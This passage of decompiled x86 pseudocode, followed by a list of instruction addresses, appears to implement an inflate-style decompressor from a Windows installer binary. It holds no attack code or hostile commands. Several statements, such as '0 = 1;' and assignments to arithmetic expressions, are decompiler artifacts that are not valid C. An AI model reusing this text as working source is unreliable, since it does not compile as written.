                                                                                                                            													__ecx =  *(__ebp - 0x20);
                                                                                                                            													 *__eax =  *__ecx;
                                                                                                                            													__eax = __eax + 1;
                                                                                                                            													__ecx = __ecx + 1;
                                                                                                                            													__edi = __edi - 1;
                                                                                                                            													__eflags = __ecx - __esi[0x26e8];
                                                                                                                            													 *(__ebp - 0x30) = __eax;
                                                                                                                            													 *(__ebp - 0x20) = __ecx;
                                                                                                                            													 *(__ebp - 0x2c) = __edi;
                                                                                                                            													if(__ecx == __esi[0x26e8]) {
                                                                                                                            														__ecx =  &(__esi[0x6e8]);
                                                                                                                            														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                                                                                            													}
                                                                                                                            													_t357 =  &(__esi[1]);
                                                                                                                            													 *_t357 = __esi[1] - 1;
                                                                                                                            													__eflags =  *_t357;
                                                                                                                            												} while ( *_t357 != 0);
                                                                                                                            											}
                                                                                                                            											goto L23;
                                                                                                                            										case 6:
                                                                                                                            											L156:
                                                                                                                            											__eax =  *(__ebp - 0x2c);
                                                                                                                            											__edi =  *(__ebp - 0x30);
                                                                                                                            											__eflags = __eax;
                                                                                                                            											if(__eax != 0) {
                                                                                                                            												L172:
                                                                                                                            												__cl = __esi[2];
                                                                                                                            												 *__edi = __cl;
                                                                                                                            												__edi = __edi + 1;
                                                                                                                            												__eax = __eax - 1;
                                                                                                                            												 *(__ebp - 0x30) = __edi;
                                                                                                                            												 *(__ebp - 0x2c) = __eax;
                                                                                                                            												goto L23;
                                                                                                                            											}
                                                                                                                            											L157:
                                                                                                                            											__ecx = __esi[0x26e8];
                                                                                                                            											__eflags = __edi - __ecx;
                                                                                                                            											if(__edi != __ecx) {
                                                                                                                            												L163:
                                                                                                                            												__esi[0x26ea] = __edi;
                                                                                                                            												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                                                                                            												__edi = __esi[0x26ea];
                                                                                                                            												__ecx = __esi[0x26e9];
                                                                                                                            												__eflags = __edi - __ecx;
                                                                                                                            												 *(__ebp - 0x30) = __edi;
                                                                                                                            												if(__edi >= __ecx) {
                                                                                                                            													__eax = __esi[0x26e8];
                                                                                                                            													__eax = __esi[0x26e8] - __edi;
                                                                                                                            													__eflags = __eax;
                                                                                                                            												} else {
                                                                                                                            													__ecx = __ecx - __edi;
                                                                                                                            													__eax = __ecx - __edi - 1;
                                                                                                                            												}
                                                                                                                            												__edx = __esi[0x26e8];
                                                                                                                            												__eflags = __edi - __edx;
                                                                                                                            												 *(__ebp - 8) = __edx;
                                                                                                                            												if(__edi == __edx) {
                                                                                                                            													__edx =  &(__esi[0x6e8]);
                                                                                                                            													__eflags = __ecx - __edx;
                                                                                                                            													if(__ecx != __edx) {
                                                                                                                            														__edi = __edx;
                                                                                                                            														__eflags = __edi - __ecx;
                                                                                                                            														 *(__ebp - 0x30) = __edi;
                                                                                                                            														if(__edi >= __ecx) {
                                                                                                                            															__eax =  *(__ebp - 8);
                                                                                                                            															__eax =  *(__ebp - 8) - __edi;
                                                                                                                            															__eflags = __eax;
                                                                                                                            														} else {
                                                                                                                            															__ecx = __ecx - __edi;
                                                                                                                            															__eax = __ecx;
                                                                                                                            														}
                                                                                                                            													}
                                                                                                                            												}
                                                                                                                            												__eflags = __eax;
                                                                                                                            												if(__eax == 0) {
                                                                                                                            													goto L183;
                                                                                                                            												} else {
                                                                                                                            													goto L172;
                                                                                                                            												}
                                                                                                                            											}
                                                                                                                            											L158:
                                                                                                                            											__eax = __esi[0x26e9];
                                                                                                                            											__edx =  &(__esi[0x6e8]);
                                                                                                                            											__eflags = __eax - __edx;
                                                                                                                            											if(__eax == __edx) {
                                                                                                                            												goto L163;
                                                                                                                            											}
                                                                                                                            											L159:
                                                                                                                            											__edi = __edx;
                                                                                                                            											__eflags = __edi - __eax;
                                                                                                                            											if(__edi >= __eax) {
                                                                                                                            												__ecx = __ecx - __edi;
                                                                                                                            												__eflags = __ecx;
                                                                                                                            												__eax = __ecx;
                                                                                                                            											} else {
                                                                                                                            												__eax = __eax - __edi;
                                                                                                                            												__eax = __eax - 1;
                                                                                                                            											}
                                                                                                                            											__eflags = __eax;
                                                                                                                            											if(__eax != 0) {
                                                                                                                            												goto L172;
                                                                                                                            											} else {
                                                                                                                            												goto L163;
                                                                                                                            											}
                                                                                                                            										case 7:
                                                                                                                            											L173:
                                                                                                                            											__eflags = __ebx - 7;
                                                                                                                            											if(__ebx > 7) {
                                                                                                                            												__ebx = __ebx - 8;
                                                                                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                                                                                            												_t380 = __ebp - 0x38;
                                                                                                                            												 *_t380 =  *(__ebp - 0x38) - 1;
                                                                                                                            												__eflags =  *_t380;
                                                                                                                            											}
                                                                                                                            											goto L175;
                                                                                                                            										case 8:
                                                                                                                            											L4:
                                                                                                                            											while(_t425 < 3) {
                                                                                                                            												if( *(_t448 - 0x34) == 0) {
                                                                                                                            													goto L182;
                                                                                                                            												} else {
                                                                                                                            													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                                                                                                            													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                                                                                                            													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                                                                                                            													_t425 = _t425 + 8;
                                                                                                                            													continue;
                                                                                                                            												}
                                                                                                                            											}
                                                                                                                            											_t425 = _t425 - 3;
                                                                                                                            											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                                                                                                            											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                                                                                                            											asm("sbb ecx, ecx");
                                                                                                                            											_t408 = _t406 >> 1;
                                                                                                                            											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                                                                                                            											if(_t408 == 0) {
                                                                                                                            												L24:
                                                                                                                            												 *_t446 = 9;
                                                                                                                            												_t436 = _t425 & 0x00000007;
                                                                                                                            												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                                                                                                            												_t425 = _t425 - _t436;
                                                                                                                            												goto L180;
                                                                                                                            											}
                                                                                                                            											L6:
                                                                                                                            											_t411 = _t408 - 1;
                                                                                                                            											if(_t411 == 0) {
                                                                                                                            												L13:
                                                                                                                            												__eflags =  *0x432e90;
                                                                                                                            												if( *0x432e90 != 0) {
                                                                                                                            													L22:
                                                                                                                            													_t412 =  *0x40a5e8; // 0x9
                                                                                                                            													_t446[4] = _t412;
                                                                                                                            													_t413 =  *0x40a5ec; // 0x5
                                                                                                                            													_t446[4] = _t413;
                                                                                                                            													_t414 =  *0x431d0c; // 0x0
                                                                                                                            													_t446[5] = _t414;
                                                                                                                            													_t415 =  *0x431d08; // 0x0
                                                                                                                            													_t446[6] = _t415;
                                                                                                                            													L23:
                                                                                                                            													 *_t446 =  *_t446 & 0x00000000;
                                                                                                                            													goto L180;
                                                                                                                            												} else {
                                                                                                                            													_t26 = _t448 - 8;
                                                                                                                            													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                                                                                            													__eflags =  *_t26;
                                                                                                                            													_t416 = 0x431d10;
                                                                                                                            													goto L15;
                                                                                                                            													L20:
                                                                                                                            													 *_t416 = _t438;
                                                                                                                            													_t416 = _t416 + 4;
                                                                                                                            													__eflags = _t416 - 0x432190;
                                                                                                                            													if(_t416 < 0x432190) {
                                                                                                                            														L15:
                                                                                                                            														__eflags = _t416 - 0x431f4c;
                                                                                                                            														_t438 = 8;
                                                                                                                            														if(_t416 > 0x431f4c) {
                                                                                                                            															__eflags = _t416 - 0x432110;
                                                                                                                            															if(_t416 >= 0x432110) {
                                                                                                                            																__eflags = _t416 - 0x432170;
                                                                                                                            																if(_t416 < 0x432170) {
                                                                                                                            																	_t438 = 7;
                                                                                                                            																}
                                                                                                                            															} else {
                                                                                                                            																_t438 = 9;
                                                                                                                            															}
                                                                                                                            														}
                                                                                                                            														goto L20;
                                                                                                                            													} else {
                                                                                                                            														E0040755C(0x431d10, 0x120, 0x101, 0x4084e8, 0x408528, 0x431d0c, 0x40a5e8, 0x432610, _t448 - 8);
                                                                                                                            														_push(0x1e);
                                                                                                                            														_pop(_t440);
                                                                                                                            														_push(5);
                                                                                                                            														_pop(_t419);
                                                                                                                            														memset(0x431d10, _t419, _t440 << 2);
                                                                                                                            														_t450 = _t450 + 0xc;
                                                                                                                            														_t442 = 0x431d10 + _t440;
                                                                                                                            														E0040755C(0x431d10, 0x1e, 0, 0x408568, 0x4085a4, 0x431d08, 0x40a5ec, 0x432610, _t448 - 8);
                                                                                                                            														 *0x432e90 =  *0x432e90 + 1;
                                                                                                                            														__eflags =  *0x432e90;
                                                                                                                            														goto L22;
                                                                                                                            													}
                                                                                                                            												}
                                                                                                                            											}
                                                                                                                            											L7:
                                                                                                                            											_t423 = _t411 - 1;
                                                                                                                            											if(_t423 == 0) {
                                                                                                                            												 *_t446 = 0xb;
                                                                                                                            												goto L180;
                                                                                                                            											}
                                                                                                                            											L8:
                                                                                                                            											if(_t423 != 1) {
                                                                                                                            												goto L180;
                                                                                                                            											}
                                                                                                                            											goto L9;
                                                                                                                            										case 9:
                                                                                                                            											while(1) {
                                                                                                                            												L27:
                                                                                                                            												__eflags = __ebx - 0x20;
                                                                                                                            												if(__ebx >= 0x20) {
                                                                                                                            													break;
                                                                                                                            												}
                                                                                                                            												L25:
                                                                                                                            												__eflags =  *(__ebp - 0x34);
                                                                                                                            												if( *(__ebp - 0x34) == 0) {
                                                                                                                            													goto L182;
                                                                                                                            												}
                                                                                                                            												L26:
                                                                                                                            												__eax =  *(__ebp - 0x38);
                                                                                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                            												__ecx = __ebx;
                                                                                                                            												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                            												__ebx = __ebx + 8;
                                                                                                                            												__eflags = __ebx;
                                                                                                                            											}
                                                                                                                            											L28:
                                                                                                                            											__eax =  *(__ebp - 0x40);
                                                                                                                            											__ebx = 0;
                                                                                                                            											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                                                                                            											 *(__ebp - 0x40) = 0;
                                                                                                                            											__eflags = __eax;
                                                                                                                            											__esi[1] = __eax;
                                                                                                                            											if(__eax == 0) {
                                                                                                                            												goto L53;
                                                                                                                            											}
                                                                                                                            											L29:
                                                                                                                            											_push(0xa);
                                                                                                                            											_pop(__eax);
                                                                                                                            											goto L54;
                                                                                                                            										case 0xa:
                                                                                                                            											L30:
                                                                                                                            											__eflags =  *(__ebp - 0x34);
                                                                                                                            											if( *(__ebp - 0x34) == 0) {
                                                                                                                            												goto L182;
                                                                                                                            											}
                                                                                                                            											L31:
                                                                                                                            											__eax =  *(__ebp - 0x2c);
                                                                                                                            											__eflags = __eax;
                                                                                                                            											if(__eax != 0) {
                                                                                                                            												L48:
                                                                                                                            												__eflags = __eax -  *(__ebp - 0x34);
                                                                                                                            												if(__eax >=  *(__ebp - 0x34)) {
                                                                                                                            													__eax =  *(__ebp - 0x34);
                                                                                                                            												}
                                                                                                                            												__ecx = __esi[1];
                                                                                                                            												__eflags = __ecx - __eax;
                                                                                                                            												__edi = __ecx;
                                                                                                                            												if(__ecx >= __eax) {
                                                                                                                            													__edi = __eax;
                                                                                                                            												}
                                                                                                                            												__eax = E00405FE8( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                                                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                                                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                                                                                            												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                                                                                            												_t80 =  &(__esi[1]);
                                                                                                                            												 *_t80 = __esi[1] - __edi;
                                                                                                                            												__eflags =  *_t80;
                                                                                                                            												if( *_t80 == 0) {
                                                                                                                            													L53:
                                                                                                                            													__eax = __esi[0x145];
                                                                                                                            													L54:
                                                                                                                            													 *__esi = __eax;
                                                                                                                            												}
                                                                                                                            												goto L180;
                                                                                                                            											}
                                                                                                                            											L32:
                                                                                                                            											__ecx = __esi[0x26e8];
                                                                                                                            											__edx =  *(__ebp - 0x30);
                                                                                                                            											__eflags = __edx - __ecx;
                                                                                                                            											if(__edx != __ecx) {
                                                                                                                            												L38:
                                                                                                                            												__esi[0x26ea] = __edx;
                                                                                                                            												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                                                                                            												__edx = __esi[0x26ea];
                                                                                                                            												__ecx = __esi[0x26e9];
                                                                                                                            												__eflags = __edx - __ecx;
                                                                                                                            												 *(__ebp - 0x30) = __edx;
                                                                                                                            												if(__edx >= __ecx) {
                                                                                                                            													__eax = __esi[0x26e8];
                                                                                                                            													__eax = __esi[0x26e8] - __edx;
                                                                                                                            													__eflags = __eax;
                                                                                                                            												} else {
                                                                                                                            													__ecx = __ecx - __edx;
                                                                                                                            													__eax = __ecx - __edx - 1;
                                                                                                                            												}
                                                                                                                            												__edi = __esi[0x26e8];
                                                                                                                            												 *(__ebp - 0x2c) = __eax;
                                                                                                                            												__eflags = __edx - __edi;
                                                                                                                            												if(__edx == __edi) {
                                                                                                                            													__edx =  &(__esi[0x6e8]);
                                                                                                                            													__eflags = __edx - __ecx;
                                                                                                                            													if(__eflags != 0) {
                                                                                                                            														 *(__ebp - 0x30) = __edx;
                                                                                                                            														if(__eflags >= 0) {
                                                                                                                            															__edi = __edi - __edx;
                                                                                                                            															__eflags = __edi;
                                                                                                                            															__eax = __edi;
                                                                                                                            														} else {
                                                                                                                            															__ecx = __ecx - __edx;
                                                                                                                            															__eax = __ecx;
                                                                                                                            														}
                                                                                                                            														 *(__ebp - 0x2c) = __eax;
                                                                                                                            													}
                                                                                                                            												}
                                                                                                                            												__eflags = __eax;
                                                                                                                            												if(__eax == 0) {
                                                                                                                            													goto L183;
                                                                                                                            												} else {
                                                                                                                            													goto L48;
                                                                                                                            												}
                                                                                                                            											}
                                                                                                                            											L33:
                                                                                                                            											__eax = __esi[0x26e9];
                                                                                                                            											__edi =  &(__esi[0x6e8]);
                                                                                                                            											__eflags = __eax - __edi;
                                                                                                                            											if(__eax == __edi) {
                                                                                                                            												goto L38;
                                                                                                                            											}
                                                                                                                            											L34:
                                                                                                                            											__edx = __edi;
                                                                                                                            											__eflags = __edx - __eax;
                                                                                                                            											 *(__ebp - 0x30) = __edx;
                                                                                                                            											if(__edx >= __eax) {
                                                                                                                            												__ecx = __ecx - __edx;
                                                                                                                            												__eflags = __ecx;
                                                                                                                            												__eax = __ecx;
                                                                                                                            											} else {
                                                                                                                            												__eax = __eax - __edx;
                                                                                                                            												__eax = __eax - 1;
                                                                                                                            											}
                                                                                                                            											__eflags = __eax;
                                                                                                                            											 *(__ebp - 0x2c) = __eax;
                                                                                                                            											if(__eax != 0) {
                                                                                                                            												goto L48;
                                                                                                                            											} else {
                                                                                                                            												goto L38;
                                                                                                                            											}
                                                                                                                            										case 0xb:
                                                                                                                            											goto L56;
                                                                                                                            										case 0xc:
                                                                                                                            											L60:
                                                                                                                            											__esi[1] = __esi[1] >> 0xa;
                                                                                                                            											__eax = (__esi[1] >> 0xa) + 4;
                                                                                                                            											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                                                            												goto L68;
                                                                                                                            											}
                                                                                                                            											goto L61;
                                                                                                                            										case 0xd:
                                                                                                                            											while(1) {
                                                                                                                            												L93:
                                                                                                                            												__eax = __esi[1];
                                                                                                                            												__ecx = __esi[2];
                                                                                                                            												__edx = __eax;
                                                                                                                            												__eax = __eax & 0x0000001f;
                                                                                                                            												__edx = __edx >> 5;
                                                                                                                            												__eax = __edx + __eax + 0x102;
                                                                                                                            												__eflags = __esi[2] - __eax;
                                                                                                                            												if(__esi[2] >= __eax) {
                                                                                                                            													break;
                                                                                                                            												}
                                                                                                                            												L73:
                                                                                                                            												__eax = __esi[0x143];
                                                                                                                            												while(1) {
                                                                                                                            													L76:
                                                                                                                            													__eflags = __ebx - __eax;
                                                                                                                            													if(__ebx >= __eax) {
                                                                                                                            														break;
                                                                                                                            													}
                                                                                                                            													L74:
                                                                                                                            													__eflags =  *(__ebp - 0x34);
                                                                                                                            													if( *(__ebp - 0x34) == 0) {
                                                                                                                            														goto L182;
                                                                                                                            													}
                                                                                                                            													L75:
                                                                                                                            													__ecx =  *(__ebp - 0x38);
                                                                                                                            													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                            													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                            													__ecx = __ebx;
                                                                                                                            													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                            													__ebx = __ebx + 8;
                                                                                                                            													__eflags = __ebx;
                                                                                                                            												}
                                                                                                                            												L77:
                                                                                                                            												__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                                                                                            												__eax = __eax &  *(__ebp - 0x40);
                                                                                                                            												__ecx = __esi[0x144];
                                                                                                                            												__eax = __esi[0x144] + __eax * 4;
                                                                                                                            												__edx =  *(__eax + 1) & 0x000000ff;
                                                                                                                            												__eax =  *(__eax + 2) & 0x0000ffff;
                                                                                                                            												__eflags = __eax - 0x10;
                                                                                                                            												 *(__ebp - 0x14) = __eax;
                                                                                                                            												if(__eax >= 0x10) {
                                                                                                                            													L79:
                                                                                                                            													__eflags = __eax - 0x12;
                                                                                                                            													if(__eax != 0x12) {
                                                                                                                            														__eax = __eax + 0xfffffff2;
                                                                                                                            														 *(__ebp - 8) = 3;
                                                                                                                            													} else {
                                                                                                                            														_push(7);
                                                                                                                            														 *(__ebp - 8) = 0xb;
                                                                                                                            														_pop(__eax);
                                                                                                                            													}
                                                                                                                            													while(1) {
                                                                                                                            														L84:
                                                                                                                            														__ecx = __eax + __edx;
                                                                                                                            														__eflags = __ebx - __eax + __edx;
                                                                                                                            														if(__ebx >= __eax + __edx) {
                                                                                                                            															break;
                                                                                                                            														}
                                                                                                                            														L82:
                                                                                                                            														__eflags =  *(__ebp - 0x34);
                                                                                                                            														if( *(__ebp - 0x34) == 0) {
                                                                                                                            															goto L182;
                                                                                                                            														}
                                                                                                                            														L83:
                                                                                                                            														__ecx =  *(__ebp - 0x38);
                                                                                                                            														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                            														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                            														__ecx = __ebx;
                                                                                                                            														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                            														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                            														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                            														__ebx = __ebx + 8;
                                                                                                                            														__eflags = __ebx;
                                                                                                                            													}
                                                                                                                            													L85:
                                                                                                                            													__ecx = __edx;
                                                                                                                            													__ebx = __ebx - __edx;
                                                                                                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                            													 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                                                            													__edx =  *(__ebp - 8);
                                                                                                                            													__ebx = __ebx - __eax;
                                                                                                                            													__edx =  *(__ebp - 8) + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                                                            													__ecx = __eax;
                                                                                                                            													__eax = __esi[1];
                                                                                                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                            													__ecx = __esi[2];
                                                                                                                            													__eax = __eax >> 5;
                                                                                                                            													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                                                                                            													__eax = __eax & 0x0000001f;
                                                                                                                            													__eax = __edi + __eax + 0x102;
                                                                                                                            													__edi = __edx + __ecx;
                                                                                                                            													__eflags = __edx + __ecx - __eax;
                                                                                                                            													if(__edx + __ecx > __eax) {
                                                                                                                            														goto L9;
                                                                                                                            													}
                                                                                                                            													L86:
                                                                                                                            													__eflags =  *(__ebp - 0x14) - 0x10;
                                                                                                                            													if( *(__ebp - 0x14) != 0x10) {
                                                                                                                            														L89:
                                                                                                                            														__edi = 0;
                                                                                                                            														__eflags = 0;
                                                                                                                            														L90:
                                                                                                                            														__eax = __esi + 0xc + __ecx * 4;
                                                                                                                            														do {
                                                                                                                            															L91:
                                                                                                                            															 *__eax = __edi;
                                                                                                                            															__ecx = __ecx + 1;
                                                                                                                            															__eax = __eax + 4;
                                                                                                                            															__edx = __edx - 1;
                                                                                                                            															__eflags = __edx;
                                                                                                                            														} while (__edx != 0);
                                                                                                                            														__esi[2] = __ecx;
                                                                                                                            														continue;
                                                                                                                            													}
                                                                                                                            													L87:
                                                                                                                            													__eflags = __ecx - 1;
                                                                                                                            													if(__ecx < 1) {
                                                                                                                            														goto L9;
                                                                                                                            													}
                                                                                                                            													L88:
                                                                                                                            													__edi =  *(__esi + 8 + __ecx * 4);
                                                                                                                            													goto L90;
                                                                                                                            												}
                                                                                                                            												L78:
                                                                                                                            												__ecx = __edx;
                                                                                                                            												__ebx = __ebx - __edx;
                                                                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                            												__ecx = __esi[2];
                                                                                                                            												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                                                                                            												__esi[2] = __esi[2] + 1;
                                                                                                                            											}
                                                                                                                            											L94:
                                                                                                                            											__eax = __esi[1];
                                                                                                                            											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                                                                                            											__edi = __eax;
                                                                                                                            											__eax = __eax >> 5;
                                                                                                                            											__edi = __edi & 0x0000001f;
                                                                                                                            											__ecx = 0x101;
                                                                                                                            											__eax = __eax & 0x0000001f;
                                                                                                                            											__edi = __edi + 0x101;
                                                                                                                            											__eax = __eax + 1;
                                                                                                                            											__edx = __ebp - 0xc;
                                                                                                                            											 *(__ebp - 0x14) = __eax;
                                                                                                                            											 &(__esi[0x148]) = __ebp - 4;
                                                                                                                            											 *(__ebp - 4) = 9;
                                                                                                                            											__ebp - 0x18 =  &(__esi[3]);
                                                                                                                            											 *(__ebp - 0x10) = 6;
                                                                                                                            											__eax = E0040755C( &(__esi[3]), __edi, 0x101, 0x4084e8, 0x408528, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                                                                                            											__eflags =  *(__ebp - 4);
                                                                                                                            											if( *(__ebp - 4) == 0) {
                                                                                                                            												__eax = __eax | 0xffffffff;
                                                                                                                            												__eflags = __eax;
                                                                                                                            											}
                                                                                                                            											__eflags = __eax;
                                                                                                                            											if(__eax != 0) {
                                                                                                                            												goto L9;
                                                                                                                            											} else {
                                                                                                                            												L97:
                                                                                                                            												__ebp - 0xc =  &(__esi[0x148]);
                                                                                                                            												__ebp - 0x10 = __ebp - 0x1c;
                                                                                                                            												__eax = __esi + 0xc + __edi * 4;
                                                                                                                            												__eax = E0040755C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408568, 0x4085a4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                                                                                            												__eflags = __eax;
                                                                                                                            												if(__eax != 0) {
                                                                                                                            													goto L9;
                                                                                                                            												}
                                                                                                                            												L98:
                                                                                                                            												__eax =  *(__ebp - 0x10);
                                                                                                                            												__eflags =  *(__ebp - 0x10);
                                                                                                                            												if( *(__ebp - 0x10) != 0) {
                                                                                                                            													L100:
                                                                                                                            													__cl =  *(__ebp - 4);
                                                                                                                            													 *__esi =  *__esi & 0x00000000;
                                                                                                                            													__eflags =  *__esi;
                                                                                                                            													__esi[4] = __al;
                                                                                                                            													__eax =  *(__ebp - 0x18);
                                                                                                                            													__esi[5] =  *(__ebp - 0x18);
                                                                                                                            													__eax =  *(__ebp - 0x1c);
                                                                                                                            													__esi[4] = __cl;
                                                                                                                            													__esi[6] =  *(__ebp - 0x1c);
                                                                                                                            													goto L101;
                                                                                                                            												}
                                                                                                                            												L99:
                                                                                                                            												__eflags = __edi - 0x101;
                                                                                                                            												if(__edi > 0x101) {
                                                                                                                            													goto L9;
                                                                                                                            												}
                                                                                                                            												goto L100;
                                                                                                                            											}
                                                                                                                            										case 0xe:
                                                                                                                            											goto L9;
                                                                                                                            										case 0xf:
                                                                                                                            											L175:
                                                                                                                            											__eax =  *(__ebp - 0x30);
                                                                                                                            											__esi[0x26ea] =  *(__ebp - 0x30);
                                                                                                                            											__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                                                                                            											__ecx = __esi[0x26ea];
                                                                                                                            											__edx = __esi[0x26e9];
                                                                                                                            											__eflags = __ecx - __edx;
                                                                                                                            											 *(__ebp - 0x30) = __ecx;
                                                                                                                            											if(__ecx >= __edx) {
                                                                                                                            												__eax = __esi[0x26e8];
                                                                                                                            												__eax = __esi[0x26e8] - __ecx;
                                                                                                                            												__eflags = __eax;
                                                                                                                            											} else {
                                                                                                                            												__edx = __edx - __ecx;
                                                                                                                            												__eax = __edx - __ecx - 1;
                                                                                                                            											}
                                                                                                                            											__eflags = __ecx - __edx;
                                                                                                                            											 *(__ebp - 0x2c) = __eax;
                                                                                                                            											if(__ecx != __edx) {
                                                                                                                            												L183:
                                                                                                                            												__edi = 0;
                                                                                                                            												goto L10;
                                                                                                                            											} else {
                                                                                                                            												L179:
                                                                                                                            												__eax = __esi[0x145];
                                                                                                                            												__eflags = __eax - 8;
                                                                                                                            												 *__esi = __eax;
                                                                                                                            												if(__eax != 8) {
                                                                                                                            													L184:
                                                                                                                            													0 = 1;
                                                                                                                            													goto L10;
                                                                                                                            												}
                                                                                                                            												goto L180;
                                                                                                                            											}
                                                                                                                            									}
                                                                                                                            								}
                                                                                                                            								L181:
                                                                                                                            								goto L9;
                                                                                                                            							}
                                                                                                                            							L70:
                                                                                                                            							if( *__edi == __eax) {
                                                                                                                            								goto L72;
                                                                                                                            							}
                                                                                                                            							L71:
                                                                                                                            							__esi[2] = __esi[2] & __eax;
                                                                                                                            							 *__esi = 0xd;
                                                                                                                            							goto L93;
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            				L182:
                                                                                                                            				_t443 = 0;
                                                                                                                            				_t446[0x147] =  *(_t448 - 0x40);
                                                                                                                            				_t446[0x146] = _t425;
                                                                                                                            				( *(_t448 + 8))[1] = 0;
                                                                                                                            				goto L11;
                                                                                                                            			}









                                                                                                                            0x00406d85
                                                                                                                            0x00406d85
                                                                                                                            0x00406d85
                                                                                                                            0x00406d85
                                                                                                                            0x00406d85
                                                                                                                            0x00406d89
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406d8f
                                                                                                                            0x00406d8f
                                                                                                                            0x00406d92
                                                                                                                            0x00406d95
                                                                                                                            0x00406d9a
                                                                                                                            0x00406d9c
                                                                                                                            0x00406d9f
                                                                                                                            0x00406da2
                                                                                                                            0x00406da5
                                                                                                                            0x00406da5
                                                                                                                            0x00406da8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406daa
                                                                                                                            0x00406daa
                                                                                                                            0x00406dad
                                                                                                                            0x00406db2
                                                                                                                            0x00406db4
                                                                                                                            0x00406db7
                                                                                                                            0x00406dbd
                                                                                                                            0x00406b1c
                                                                                                                            0x00406b1c
                                                                                                                            0x00406b1f
                                                                                                                            0x00406b25
                                                                                                                            0x00406b2b
                                                                                                                            0x00406b34
                                                                                                                            0x00406b3a
                                                                                                                            0x00406b3d
                                                                                                                            0x00406b44
                                                                                                                            0x00406b49
                                                                                                                            0x00406b4f
                                                                                                                            0x00406b5a
                                                                                                                            0x00406b5a
                                                                                                                            0x00406dc3
                                                                                                                            0x00406dc3
                                                                                                                            0x00406dcd
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406dd3
                                                                                                                            0x00406dd3
                                                                                                                            0x00406dd7
                                                                                                                            0x00406dda
                                                                                                                            0x00406dda
                                                                                                                            0x00406dde
                                                                                                                            0x00406de4
                                                                                                                            0x00406de4
                                                                                                                            0x00406de7
                                                                                                                            0x00406dea
                                                                                                                            0x00406df0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406df2
                                                                                                                            0x00406e14
                                                                                                                            0x00406e14
                                                                                                                            0x00406e17
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406df4
                                                                                                                            0x00406df8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406dfe
                                                                                                                            0x00406dfe
                                                                                                                            0x00406e01
                                                                                                                            0x00406e04
                                                                                                                            0x00406e09
                                                                                                                            0x00406e0b
                                                                                                                            0x00406e0e
                                                                                                                            0x00406e11
                                                                                                                            0x00406e11
                                                                                                                            0x00406e19
                                                                                                                            0x00406e19
                                                                                                                            0x00406e1f
                                                                                                                            0x00406e22
                                                                                                                            0x00406e25
                                                                                                                            0x00406e25
                                                                                                                            0x00406e2c
                                                                                                                            0x00406e30
